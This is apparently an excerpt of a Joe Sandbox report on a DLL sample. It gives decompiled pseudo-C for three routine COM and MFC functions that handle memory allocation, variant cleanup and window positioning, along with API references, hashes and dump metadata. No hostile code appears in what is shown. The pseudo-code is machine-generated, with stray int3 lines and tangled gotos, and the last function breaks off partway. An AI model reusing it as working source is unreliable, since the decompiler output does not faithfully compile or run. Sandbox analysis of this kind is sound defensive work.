				intOrPtr* _t148;
				signed int _t149;
				signed int _t151;
				intOrPtr* _t152;
				void* _t154;
				intOrPtr* _t158;
				signed int _t163;
				intOrPtr _t164;
				intOrPtr* _t166;
				intOrPtr* _t168;
				void* _t179;
				intOrPtr _t182;
				signed int _t183;
				signed int _t185;
				signed int* _t186;
				void* _t187;
				intOrPtr* _t188;
				signed int _t202;
				signed int _t204;
				intOrPtr _t214;
				intOrPtr _t220;
				intOrPtr* _t222;
				intOrPtr _t223;
				signed int _t225;
				void* _t228;
				void* _t229;
				void* _t231;
				void* _t232;

				_t188 = __ecx;
				_t181 = __ebx;
				_t232 = _t231 - 0x74;
				_t225 =  &_v124;
				_t132 =  *0x10045580; // 0xe155dca3
				_a116 = _t132 ^ _t225;
				_push(0x1c);
				E1001FBC4(E100344DD, __ebx, __edi, __esi);
				_t222 = __ecx;
				_v16 =  *((intOrPtr*)(__ecx + 0x14));
				_a4 =  *((intOrPtr*)(__ecx + 0x10));
				if( *((intOrPtr*)(__ecx + 0x48)) == 0) {
					_t138 =  *(__ecx + 8);
					__eflags = _t138;
					if(_t138 != 0) {
						_t215 =  &_a12;
						_t139 =  *((intOrPtr*)( *_t138 + 0xc))(_t138, 0x1003b18c,  &_a12,  &_a8);
						__eflags = _t139;
						if(_t139 >= 0) {
							E100157C0( &_a12,  &_a20, 0x1003b8b8);
							_a52 = _a52 | 0xffffffff;
							_a44 = 0;
							_a48 = 0;
							_a56 = 0x18;
							_a60 = 0;
							_a64 = 0x1fb;
							E100157C0( &_a12,  &_a68, 0x1003b8a0);
							_t145 = _a12;
							_a100 = _a100 | 0xffffffff;
							_t215 =  &_a20;
							_a92 = 0x1c;
							_a96 = 0;
							_a104 = 0x20;
							_a108 = 0;
							_a112 = 0x1e;
							_t183 =  *((intOrPtr*)( *_t145 + 0x10))(_t145, 2,  &_a20, 0x28, 0);
							__eflags = _t183;
							if(_t183 >= 0) {
								_t215 = 0;
								_v40 = _a8;
								_t148 = _a12;
								_v36 = 1;
								_v32 = 0;
								_v28 = 0;
								_v24 = 0;
								_t149 =  *((intOrPtr*)( *_t148 + 0x18))(_t148, 0, 0,  &_v40);
								__eflags = _t149;
								 *_t225 = _t149;
								if(_t149 >= 0) {
									 *((intOrPtr*)(_t222 + 0x14)) = _v32;
									_t151 = _v20;
									_a8 = _t151;
									 *(_t222 + 0x10) = _t151;
									_t152 = _a12;
									 *((intOrPtr*)(_t222 + 0x34)) = _v28;
									 *((intOrPtr*)( *_t152 + 8))(_t152);
									goto L32;
								} else {
									_t166 = _a12;
									 *((intOrPtr*)( *_t166 + 8))(_t166);
								}
								goto L50;
							} else {
								_t168 = _a12;
								 *((intOrPtr*)( *_t168 + 8))(_t168);
								_t139 = _t183;
							}
						}
					} else {
						_t139 = 0;
					}
					goto L51;
				} else {
					__eax =  *(__esi + 0x4c);
					__ecx =  *__eax;
					__edx =  &_a16;
					__eax =  *((intOrPtr*)(__ecx + 0x14))(__eax, 0x1003b39c, __edx);
					__eflags = __eax;
					 *__ebp = __eax;
					if(__eax < 0) {
						L51:
						 *[fs:0x0] = _v12;
						_pop(_t220);
						_pop(_t223);
						_pop(_t182);
						_t140 = E1001FBB5(_t139, _t182, _a116 ^ _t225, _t215, _t220, _t223);
						__eflags =  &_a120;
						return _t140;
					} else {
						__eax = _a16;
						__ecx =  *__eax;
						__edx =  &_a8;
						_push( &_a8);
						_push(0x1003b37c);
						_push(__eax);
						__eflags = __eax;
						if(__eflags >= 0) {
							__eax = _a8;
							__edx =  &_a12;
							_push( &_a12);
							_push(0x1003b4bc);
							_a12 = 0;
							__ecx =  *__eax;
							_push(__eax);
							__eflags = __eax;
							if(__eflags >= 0) {
								__eax = _a12;
								__ecx =  *__eax;
								__edx = __esi + 0x58;
								__edx =  *(__esi + 4);
								__edx =  *(__esi + 4) + 0xe8;
								__eflags = __edx;
								__eax =  *((intOrPtr*)( *__eax + 0x14))(__eax, __edx, __esi + 0x58);
								__eax = _a12;
								__ecx =  *__eax;
								__eax =  *((intOrPtr*)( *__eax + 8))(__eax);
							}
							__eax = _a8;
							__ecx =  *__eax;
							__eax =  *((intOrPtr*)( *__eax + 8))(__eax);
						}
						__eax = E10004D4A(__eflags, 0x14);
						__eflags = __eax - __edi;
						if(__eax == __edi) {
							__eax = 0;
							__eflags = 0;
						} else {
							__ecx = __eax;
							__eax = E100185F7(__eax, _a16);
						}
						 *(__esi + 0x50) = __eax;
						__eax = _a16;
						__ecx =  *__eax;
						__eax =  *((intOrPtr*)( *__eax + 8))(__eax);
						__eax =  *(__esi + 0x50);
						__ecx =  *__eax;
						__eflags =  *__eax - __edi;
						if(__eflags != 0) {
							__eflags = __eax;
							__eax = E100159E9(__ecx, __eax);
						}
						__eax = E10004D4A(__eflags, 0x28);
						__eflags = __eax - __edi;
						if(__eax == __edi) {
							__eax = 0;
							__eflags = 0;
						} else {
							__ecx = __eax;
							__eax = E10014659(__eax, __edi, 0x1f40);
						}
						__edx =  *(__esi + 0x50);
						 *(__esi + 0x54) = __eax;
						_push( *( *(__esi + 0x50)));
						__ecx = __eax;
						__eax =  *(__esi + 0x54);
						__ecx =  *(__esi + 0x50);
						 *(__ecx + 8) =  *(__esi + 0x54);
						__eax =  *(__esi + 0x54);
						__eax =  *( *(__esi + 0x54) + 0xc);
						__eflags = __eax - 0x3333333;
						 *(__esi + 0x10) = __eax;
						if(__eax <= 0x3333333) {
							__eax = __eax * 0x28;
							__imp__CoTaskMemAlloc(__eax);
							__ecx = 0;
							__eflags = __eax - __edi;
							__ecx = 0 | __eflags != 0x00000000;
							 *(__esi + 0x14) = __eax;
							if(__eflags != 0) {
								 *(__esi + 0x10) =  *(__esi + 0x10) * 0x28;
								__eax = E10020F40(__edi, __eax, __edi,  *(__esi + 0x10) * 0x28);
								__ecx =  *(__esi + 0x50);
								__eax = E10018619( *(__esi + 0x50));
								__ecx =  *(__esi + 0x50);
								__eax = E100159A6(__ecx);
								L32:
								__eflags =  *(_t222 + 0x10);
								_a16 = 0;
								if( *(_t222 + 0x10) > 0) {
									_t187 = 0;
									__eflags = 0;
									do {
										_t163 = E10004D4A(__eflags, 0x1c);
										_a8 = _t163;
										__eflags = _t163;
										_v4 = 0;
										if(_t163 == 0) {
											_t164 = 0;
											__eflags = 0;
										} else {
											_t164 = E1001B8FB(_t163, 0xa);
										}
										_v4 = _v4 | 0xffffffff;
										_a16 = _a16 + 1;
										 *((intOrPtr*)(_t187 +  *((intOrPtr*)(_t222 + 0x14)) + 0x24)) = _t164;
										_t187 = _t187 + 0x28;
										__eflags = _a16 -  *(_t222 + 0x10);
									} while (__eflags < 0);
								}
								_t185 = _v16;
								__eflags = _t185;
								if(_t185 != 0) {
									__eflags = _a4;
									if(_a4 > 0) {
										_t154 = 0xffffffdc;
										_t186 = _t185 + 0x24;
										_a16 = _a4;
										_a8 = _t154 - _v16;
										while(1) {
											_t202 =  *( *_t186 + 4);
											__eflags = _t202;
											_a4 = _t202;
											if(_t202 == 0) {
												goto L46;
											}
											while(1) {
												_t158 = E1000911A( &_a4);
												_t215 =  *_t222;
												 *((intOrPtr*)( *_t222 + 8))( *_t158, 1);
												__eflags = _a4;
												if(_a4 == 0) {
													goto L46;
												}
											}
											L46:
											E1001B823( *_t186);
											_t204 =  *_t186;
											__eflags = _t204;
											if(_t204 != 0) {
												 *((intOrPtr*)( *_t204 + 4))(1);
											}
											_t186 =  &(_t186[0xa]);
											_t127 =  &_a16;
											 *_t127 = _a16 - 1;
											__eflags =  *_t127;
											if( *_t127 != 0) {
												continue;
											}
											goto L49;
										}
									}
									L49:
									__imp__CoTaskMemFree(_v16);
								}
								L50:
								_t139 =  *_t225;
								goto L51;
							} else {
								_push(_t225);
								_t228 = _t232;
								_push(_t188);
								_v168 = 0x100442e0;
								E100209E8( &_v168, 0x1003e1e4);
								asm("int3");
								_push(_t228);
								_t229 = _t232;
								_push(_t188);
								_v176 = 0x10044378;
								E100209E8( &_v176, 0x1003e298);
								asm("int3");
								_push(_t229);
								_push(_t188);
								_v184 = 0x10044410;
								E100209E8( &_v184, 0x1003e2dc);
								asm("int3");
								_push(4);
								E1001FBC4(E10032E9B, _t181, 0, _t222);
								_t214 = E100105C8(0x104);
								_v196 = _t214;
								_t179 = 0;
								_v184 = 0;
								if(_t214 != 0) {
									_t179 = E1000E58E(_t214);
								}
								return E1001FC9C(_t179);
							}
						} else {
							__eax = 0x8007000e;
							goto L51;
						}
					}
				}
			}

0x10018da4
0x10018da4
0x10018da5
0x10018da8
0x10018dac
0x10018db3
0x10018db6
0x10018dbd
0x10018dc2
0x10018dc7
0x10018dd2
0x10018dd5
0x10018f1a
0x10018f1d
0x10018f1f
0x10018f2e
0x10018f38
0x10018f3b
0x10018f3d
0x10018f4e
0x10018f53
0x10018f62
0x10018f65
0x10018f68
0x10018f6f
0x10018f72
0x10018f79
0x10018f7e
0x10018f81
0x10018f88
0x10018f8e
0x10018f95
0x10018f98
0x10018f9f
0x10018fa2
0x10018faf
0x10018fb1
0x10018fb3
0x10018fcc
0x10018fcf
0x10018fd2
0x10018fd8
0x10018fdf
0x10018fe2
0x10018fe5
0x10018feb
0x10018fee
0x10018ff0
0x10018ff3
0x10019009
0x1001900c
0x1001900f
0x10019012
0x10019015
0x10019018
0x1001901e
0x00000000
0x10018ff5
0x10018ff5
0x10018ffb
0x10018ffb
0x00000000
0x10018fb5
0x10018fb5
0x10018fbb
0x10018fbe
0x10018fbe
0x10018fb3
0x10018f21
0x10018f21
0x10018f21
0x00000000
0x10018ddb
0x10018ddb
0x10018dde
0x10018de0
0x10018dea
0x10018ded
0x10018def
0x10018df2
0x100190e2
0x100190e5
0x100190ed
0x100190ee
0x100190ef
0x100190f5
0x100190fa
0x100190fe
0x10018df8
0x10018df8
0x10018dfb
0x10018dfd
0x10018e00
0x10018e01
0x10018e06
0x10018e09
0x10018e0b
0x10018e0d
0x10018e10
0x10018e13
0x10018e14
0x10018e19
0x10018e1c
0x10018e1e
0x10018e22
0x10018e24
0x10018e26
0x10018e29
0x10018e2b
0x10018e2f
0x10018e32
0x10018e32
0x10018e3a
0x10018e3d
0x10018e40
0x10018e43
0x10018e43
0x10018e46
0x10018e49
0x10018e4c
0x10018e4c
0x10018e51
0x10018e56
0x10018e59
0x10018e67
0x10018e67
0x10018e5b
0x10018e5e
0x10018e60
0x10018e60
0x10018e69
0x10018e6c
0x10018e6f
0x10018e72
0x10018e75
0x10018e78
0x10018e7a
0x10018e7c
0x10018e7e
0x10018e83
0x10018e83
0x10018e8a
0x10018e8f
0x10018e92
0x10018ea3
0x10018ea3
0x10018e94
0x10018e9a
0x10018e9c
0x10018e9c
0x10018ea5
0x10018ea8
0x10018eab
0x10018ead
0x10018eb4
0x10018eb7
0x10018eba
0x10018ebd
0x10018ec0
0x10018ec3
0x10018ec8
0x10018ecb
0x10018ed7
0x10018edb
0x10018ee1
0x10018ee3
0x10018ee5
0x10018ee8
0x10018eed
0x10018ef7
0x10018efd
0x10018f02
0x10018f08
0x10018f0d
0x10018f10
0x10019021
0x10019021
0x10019024
0x10019027
0x10019029
0x10019029
0x1001902b
0x1001902d
0x10019033
0x10019036
0x10019038
0x1001903b
0x10019048
0x10019048
0x1001903d
0x10019041
0x10019041
0x1001904a
0x10019051
0x10019054
0x1001905b
0x1001905e
0x1001905e
0x1001902b
0x10019063
0x10019066
0x10019068
0x1001906a
0x1001906d
0x10019074
0x10019075
0x1001907b
0x1001907e
0x10019086
0x10019088
0x1001908b
0x1001908d
0x10019090
0x00000000
0x00000000
0x10019097
0x100190a4
0x100190ab
0x100190b2
0x100190b5
0x100190b8
0x00000000
0x00000000
0x10019094
0x100190ba
0x100190bc
0x100190c1
0x100190c3
0x100190c5
0x100190cb
0x100190cb
0x100190ce
0x100190d1
0x100190d1
0x100190d1
0x100190d4
0x00000000
0x10019083
0x00000000
0x100190d4
0x10019086
0x100190d6
0x100190d9
0x100190d9
0x100190df
0x100190df
0x00000000
0x10018eef
0x10004e3a
0x10004e3b
0x10004e3d
0x10004e47
0x10004e4e
0x10004e53
0x10004e54
0x10004e55
0x10004e57
0x10004e61
0x10004e68
0x10004e6d
0x10004e6e
0x10004e71
0x10004e7b
0x10004e82
0x10004e87
0x10004e88
0x10004e8f
0x10004e9e
0x10004ea0
0x10004ea3
0x10004ea7
0x10004eaa
0x10004eac
0x10004eac
0x10004eb6
0x10004eb6
0x10018ecd
0x10018ecd
0x00000000
0x10018ecd
0x10018ecb
0x10018df2

APIs

__EH_prolog3.LIBCMT ref: 10018DBD
CoTaskMemAlloc.OLE32(?,?), ref: 10018EDB
_memset.LIBCMT ref: 10018EFD
CoTaskMemFree.OLE32(?), ref: 100190D9

Part of subcall function 10004D4A: _malloc.LIBCMT ref: 10004D64

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: Task$AllocFreeH_prolog3_malloc_memset
String ID:
API String ID: 2459298410-0
Opcode ID: b121ae2c8e829696b65b9efb5c59cf0f74438459b6ac44388d9d562fa2d0b33e
Instruction ID: a1cdd10b8d3f28a5117ac55e09806983a961173fe6bfd8d1acb233a2e2c4c6df
Opcode Fuzzy Hash: b121ae2c8e829696b65b9efb5c59cf0f74438459b6ac44388d9d562fa2d0b33e
Instruction Fuzzy Hash: C9C106B4600709EFCB15CF68C88499AB7F5FF88704B20891AF956CF291DB71EA85CB50

Uniqueness

Uniqueness Score: -1.00%

Function 10019C50 Relevance: 6.2, APIs: 4, Instructions: 186
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 70%

			E10019C50(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t83;
				intOrPtr* _t84;
				intOrPtr _t85;
				intOrPtr* _t86;
				intOrPtr _t101;
				intOrPtr* _t121;
				intOrPtr* _t122;
				intOrPtr* _t124;
				intOrPtr* _t126;
				intOrPtr* _t128;
				intOrPtr* _t130;
				intOrPtr* _t145;
				intOrPtr* _t151;
				intOrPtr* _t160;
				intOrPtr _t161;
				intOrPtr _t162;
				void* _t163;
				void* _t164;
				intOrPtr _t166;
				intOrPtr* _t167;
				void* _t168;
				intOrPtr _t180;

				_push(0x10);
				E1001FBC4(E100345BC, __ebx, __edi, __esi);
				_t166 = __ecx;
				 *((intOrPtr*)(_t168 - 0x1c)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x1003892c;
				 *(_t168 - 4) = 0;
				if( *((intOrPtr*)(__ecx + 0x58)) == 0) {
					L11:
					while( *((intOrPtr*)(_t166 + 0x24)) != 0) {
						_t160 =  *((intOrPtr*)( *((intOrPtr*)(_t166 + 0x1c)) + 8));
						__eflags = _t160;
						if(_t160 == 0) {
							break;
						}
						_t151 =  *_t160;
						__eflags = _t151;
						if(_t151 == 0) {
							break;
						}
						 *((intOrPtr*)( *_t151 + 0xbc))( *((intOrPtr*)(_t160 + 8)), 0);
						 *((intOrPtr*)( *_t160 + 0x98)) = 0;
					}
					 *((intOrPtr*)(_t168 - 0x18)) = _t166 + 0x18;
					E1001B823(_t166 + 0x18);
					if( *((intOrPtr*)(_t166 + 0x40)) == 0) {
						L19:
						_t83 =  *((intOrPtr*)(_t166 + 8));
						if(_t83 != 0) {
							 *((intOrPtr*)( *_t83 + 8))(_t83);
						}
						_t84 =  *((intOrPtr*)(_t166 + 0xc));
						if(_t84 != 0) {
							 *((intOrPtr*)( *_t84 + 8))(_t84);
						}
						if( *((intOrPtr*)(_t166 + 0x14)) == 0) {
							L32:
							_t85 =  *((intOrPtr*)(_t166 + 0x34));
							if(_t85 != 0) {
								__imp__CoTaskMemFree(_t85);
							}
							_t136 =  *((intOrPtr*)(_t166 + 0x54));
							if( *((intOrPtr*)(_t166 + 0x54)) != 0) {
								E10018664(_t136,  *((intOrPtr*)( *((intOrPtr*)(_t166 + 0x50)))));
								E10014682( *((intOrPtr*)(_t166 + 0x54)));
							}
							_t161 =  *((intOrPtr*)(_t166 + 0x54));
							_t192 = _t161;
							if(_t161 != 0) {
								E10014682(_t161);
								_push(_t161);
								E10004D75(0, _t161, _t166, _t192);
							}
							_t162 =  *((intOrPtr*)(_t166 + 0x50));
							_t193 = _t162;
							if(_t162 != 0) {
								E10019A2F(_t162, _t193);
								_push(_t162);
								E10004D75(0, _t162, _t166, _t193);
							}
							_t86 =  *((intOrPtr*)(_t166 + 0x4c));
							if(_t86 != 0) {
								 *((intOrPtr*)( *_t86 + 8))(_t86);
							}
							_t167 =  *((intOrPtr*)(_t166 + 0x48));
							if(_t167 != 0) {
								 *((intOrPtr*)( *_t167 + 8))(_t167);
							}
							 *(_t168 - 4) =  *(_t168 - 4) | 0xffffffff;
							return E1001FC9C(E1001B91E( *((intOrPtr*)(_t168 - 0x18))));
						} else {
							 *((intOrPtr*)(_t168 - 0x10)) = 0;
							if( *((intOrPtr*)(_t166 + 0x10)) <= 0) {
								L31:
								__imp__CoTaskMemFree( *((intOrPtr*)(_t166 + 0x14)));
								goto L32;
							}
							_t163 = 0;
							do {
								_t101 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t166 + 0x14)) + _t163 + 0x24)) + 4));
								 *((intOrPtr*)(_t168 - 0x14)) = _t101;
								if(_t101 == 0) {
									goto L28;
								} else {
									goto L27;
								}
								do {
									L27:
									 *((intOrPtr*)( *((intOrPtr*)(E1000911A(_t168 - 0x14))) + 0x98)) = 0;
								} while ( *((intOrPtr*)(_t168 - 0x14)) != 0);
								L28:
								E1001B823( *((intOrPtr*)( *((intOrPtr*)(_t166 + 0x14)) + _t163 + 0x24)));
								_t145 =  *((intOrPtr*)( *((intOrPtr*)(_t166 + 0x14)) + _t163 + 0x24));
								if(_t145 != 0) {
									 *((intOrPtr*)( *_t145 + 4))(1);
								}
								 *((intOrPtr*)(_t168 - 0x10)) =  *((intOrPtr*)(_t168 - 0x10)) + 1;
								_t163 = _t163 + 0x28;
							} while ( *((intOrPtr*)(_t168 - 0x10)) <  *((intOrPtr*)(_t166 + 0x10)));
							goto L31;
						}
					}
					_t164 = 0;
					if( *((intOrPtr*)(_t166 + 0x38)) <= 0) {
						L17:
						if(_t180 != 0) {
							_push( *((intOrPtr*)(_t166 + 0x3c)));
							E10004D75(0, _t164, _t166, _t180);
							_push( *((intOrPtr*)(_t166 + 0x40)));
							E10004D75(0, _t164, _t166, _t180);
						}
						goto L19;
					}
					 *((intOrPtr*)(_t168 - 0x10)) = 0;
					do {
						__imp__#9( *((intOrPtr*)(_t166 + 0x40)) +  *((intOrPtr*)(_t168 - 0x10)));
						 *((intOrPtr*)(_t168 - 0x10)) =  *((intOrPtr*)(_t168 - 0x10)) + 0x10;
						_t164 = _t164 + 1;
					} while (_t164 <  *((intOrPtr*)(_t166 + 0x38)));
					_t180 =  *((intOrPtr*)(_t166 + 0x38));
					goto L17;
				}
				_t121 =  *((intOrPtr*)(__ecx + 0x50));
				if(_t121 == 0) {
					goto L11;
				}
				_t122 =  *_t121;
				_push(_t168 - 0x14);
				_push(0x1003b37c);
				_push(_t122);
				if( *((intOrPtr*)( *_t122))() < 0) {
					goto L11;
				}
				_t124 =  *((intOrPtr*)(_t168 - 0x14));
				if(_t124 == 0) {
					goto L11;
				}
				_push(_t168 - 0x10);
				_push(0x1003b4bc);
				 *((intOrPtr*)(_t168 - 0x10)) = 0;
				_push(_t124);
				if( *((intOrPtr*)( *_t124 + 0x10))() >= 0) {
					_t128 =  *((intOrPtr*)(_t168 - 0x10));
					if(_t128 != 0) {
						 *((intOrPtr*)( *_t128 + 0x18))(_t128,  *((intOrPtr*)(__ecx + 0x58)));
						_t130 =  *((intOrPtr*)(_t168 - 0x10));
						 *((intOrPtr*)( *_t130 + 8))(_t130);
					}
				}
				_t126 =  *((intOrPtr*)(_t168 - 0x14));
				 *((intOrPtr*)( *_t126 + 8))(_t126);
				goto L11;
			}

0x10019c50
0x10019c57
0x10019c5c
0x10019c5e
0x10019c61
0x10019c6c
0x10019c6f
0x00000000
0x10019cf5
0x10019cd4
0x10019cd7
0x10019cd9
0x00000000
0x00000000
0x10019cdb
0x10019cdd
0x10019cdf
0x00000000
0x00000000
0x10019ce7
0x10019cef
0x10019cef
0x10019cfd
0x10019d00
0x10019d08
0x10019d42
0x10019d42
0x10019d47
0x10019d4c
0x10019d4c
0x10019d4f
0x10019d54
0x10019d59
0x10019d59
0x10019d5f
0x10019dce
0x10019dce
0x10019dd3
0x10019dd6
0x10019dd6
0x10019ddc
0x10019de1
0x10019de8
0x10019df0
0x10019df0
0x10019df5
0x10019df8
0x10019dfa
0x10019dfe
0x10019e03
0x10019e04
0x10019e09
0x10019e0a
0x10019e0d
0x10019e0f
0x10019e13
0x10019e18
0x10019e19
0x10019e1e
0x10019e1f
0x10019e24
0x10019e29
0x10019e29
0x10019e2c
0x10019e31
0x10019e36
0x10019e36
0x10019e3c
0x10019e4a
0x10019d61
0x10019d64
0x10019d67
0x10019dc5
0x10019dc8
0x00000000
0x10019dc8
0x10019d69
0x10019d6b
0x10019d72
0x10019d77
0x10019d7a
0x00000000
0x00000000
0x00000000
0x00000000
0x10019d7c
0x10019d7c
0x10019d91
0x10019d91
0x10019d99
0x10019da0
0x10019da8
0x10019dae
0x10019db4
0x10019db4
0x10019db7
0x10019dbd
0x10019dc0
0x00000000
0x10019d6b
0x10019d5f
0x10019d0a
0x10019d0f
0x10019d2e
0x10019d2e
0x10019d30
0x10019d33
0x10019d38
0x10019d3b
0x10019d41
0x00000000
0x10019d2e
0x10019d11
0x10019d14
0x10019d1b
0x10019d21
0x10019d25
0x10019d26
0x10019d2b
0x00000000
0x10019d2b
0x10019c75
0x10019c7a
0x00000000
0x00000000
0x10019c7c
0x10019c83
0x10019c84
0x10019c89
0x10019c8e
0x00000000
0x00000000
0x10019c90
0x10019c95
0x00000000
0x00000000
0x10019c9a
0x10019c9b
0x10019ca0
0x10019ca5
0x10019cab
0x10019cad
0x10019cb2
0x10019cba
0x10019cbd
0x10019cc3
0x10019cc3
0x10019cb2
0x10019cc6
0x10019ccc
0x00000000

APIs

__EH_prolog3.LIBCMT ref: 10019C57
VariantClear.OLEAUT32(?), ref: 10019D1B
CoTaskMemFree.OLE32(?,00000010), ref: 10019DC8
CoTaskMemFree.OLE32(?,00000010), ref: 10019DD6

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: FreeTask$ClearH_prolog3Variant
String ID:
API String ID: 365290523-0
Opcode ID: cd38f89cae56ad47c5dcbd5386d246e758d2adde0798c45e4cdf38565e7e9628
Instruction ID: f4ca11870bf7736933ae268dd06283376a7c22ef50caea19de43a80b2043cb75
Opcode Fuzzy Hash: cd38f89cae56ad47c5dcbd5386d246e758d2adde0798c45e4cdf38565e7e9628
Instruction Fuzzy Hash: C6711475A00A42DFCB60CFA8C9C586AB7F6FF48304762486DE5469BA61CB31FD81CB51

Uniqueness

Uniqueness Score: -1.00%

Function 1001987A Relevance: 6.2, APIs: 4, Instructions: 173
windowCOMMON

Download Yara Rule

C-Code - Quality: 34%

			E1001987A(signed int __ecx, void* __edx) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				signed int _v24;
				struct tagRECT _v40;
				struct tagRECT _v56;
				char _v76;
				intOrPtr _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t63;
				signed int _t64;
				intOrPtr _t70;
				signed int _t72;
				signed int _t73;
				signed int _t75;
				intOrPtr* _t77;
				signed int _t78;
				intOrPtr* _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t84;
				signed int _t86;
				signed int _t88;
				signed int _t92;
				intOrPtr* _t99;
				signed int _t100;
				signed int _t126;
				intOrPtr _t127;
				void* _t144;
				void* _t147;
				intOrPtr* _t148;
				signed int** _t150;
				signed int* _t151;
				signed int _t154;
				signed int _t156;
				void* _t158;
				void* _t161;

				_t144 = __edx;
				_t126 = __ecx;
				_t158 = _t161;
				_t154 = __ecx;
				_t63 =  *((intOrPtr*)(__ecx + 4));
				_push(_t147);
				if(_t63 != 0) {
					_t64 =  *(_t63 + 0x28);
					__eflags = _t64;
					if(_t64 == 0) {
						goto L4;
					} else {
						_t126 = _t64;
						_t72 = E1000BBDF(0, _t126, _t147);
						__eflags = _t72;
						_v8 = _t72;
						if(_t72 == 0) {
							goto L4;
						} else {
							_t73 = IsWindowVisible( *(_t72 + 0x20));
							asm("sbb eax, eax");
							_t75 =  ~_t73 + 1;
							__eflags = _t75;
							_v24 = _t75;
							if(_t75 != 0) {
								GetWindowRect( *(E1000A8F0(0, _t126, _t158, GetDesktopWindow()) + 0x20),  &_v56);
								GetWindowRect( *(_v8 + 0x20),  &_v40);
								asm("cdq");
								asm("cdq");
								__eflags = _v56.right - _v56.left - _t144;
								E1000EF54(_v8, _v56.right - _v56.left - _t144 >> 1, _v56.bottom - _v56.top - _t144 >> 1, 0, 0, 0);
								E1000EF92(_v8, 1);
							}
							_t77 =  *((intOrPtr*)( *((intOrPtr*)(_t154 + 4)) + 0x50));
							_t148 = _t154 + 0x48;
							_t78 =  *((intOrPtr*)( *_t77))(_t77, 0x100388c0, _t148);
							__eflags = _t78;
							if(_t78 < 0) {
								_t80 =  *((intOrPtr*)( *((intOrPtr*)(_t154 + 4)) + 0x50));
								_t81 =  *((intOrPtr*)( *_t80))(_t80, 0x10038918,  &_v16);
								__eflags = _t81;
								if(_t81 >= 0) {
									_t82 = _v16;
									 *((intOrPtr*)( *_t82 + 0x14))(_t82,  &_v20);
									_t84 = _v16;
									 *((intOrPtr*)( *_t84 + 8))(_t84);
									_t86 = _v20;
									__eflags = _t86;
									if(_t86 != 0) {
										_t150 = _t154 + 8;
										_v12 =  *((intOrPtr*)( *_t86))(_t86, 0x1003b17c, _t150);
										_t88 = _v20;
										 *((intOrPtr*)( *_t88 + 8))(_t88);
										_t81 = _v12;
										__eflags = _t81;
										if(__eflags >= 0) {
											_t151 =  *_t150;
											 *( *_t151)(_t151, 0x1003b16c, _t154 + 0xc);
											goto L21;
										}
									} else {
										_t81 = 0x80004005;
									}
								}
							} else {
								_t99 =  *_t148;
								_t151 = _t154 + 0x4c;
								_t100 =  *((intOrPtr*)( *_t99 + 0xc))(_t99, 0, 0x1003b40c, _t151);
								__eflags =  *_t151;
								_v12 = _t100;
								if( *_t151 == 0) {
									_v12 = 0x80004003;
								}
								__eflags = _v12;
								if(__eflags >= 0) {
									L21:
									_t92 = E10018DA4(0, _t154, _t151, _t154, __eflags);
									__eflags = _v24;
									_t156 = _t92;
									if(_v24 != 0) {
										__eflags = _v40.right - _v40.left;
										E1000EF54(_v8, _v40.left, _v40.top, _v40.right - _v40.left, _v40.bottom - _v40.top, 0);
										E1000EF92(_v8, 0);
									}
									_t81 = _t156;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										__eflags = _v40.right - _v40.left;
										E1000EF54(_v8, _v40.left, _v40.top, _v40.right - _v40.left, _v40.bottom - _v40.top, 0);
										E1000EF92(_v8, 0);
									}
									_t81 = _v12;
								}
							}
							return _t81;
						}
					}
				} else {
					L4:
					_push(_t158);
					_push(_t126);
					_v76 = 0x10044410;
					E100209E8( &_v76, 0x1003e2dc);
					asm("int3");
					_push(4);
					E1001FBC4(E10032E9B, 0, _t147, _t154);
					_t127 = E100105C8(0x104);
					_v88 = _t127;
					_t70 = 0;
					_v76 = 0;
					if(_t127 != 0) {
						_t70 = E1000E58E(_t127);
					}
					return E1001FC9C(_t70);
				}
			}

0x1001987a
0x1001987a
0x1001987b
0x10019882
0x10019884
0x1001988b
0x1001988c
0x10019893
0x10019896
0x10019898
0x00000000
0x1001989a
0x1001989a
